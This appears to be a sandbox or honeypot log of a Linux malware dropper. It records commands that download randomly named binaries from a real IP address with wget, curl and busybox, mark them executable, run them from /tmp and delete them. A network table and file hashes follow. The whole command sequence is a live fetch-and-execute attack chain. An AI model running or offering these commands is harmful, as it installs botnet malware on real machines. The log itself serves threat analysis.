[curl -O http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/chmod
[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/rm
[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/wget
[wget http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/chmod
[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/rm
[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/wget
[wget http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/chmod
[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae
[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/rm
[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/wget
[wget http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |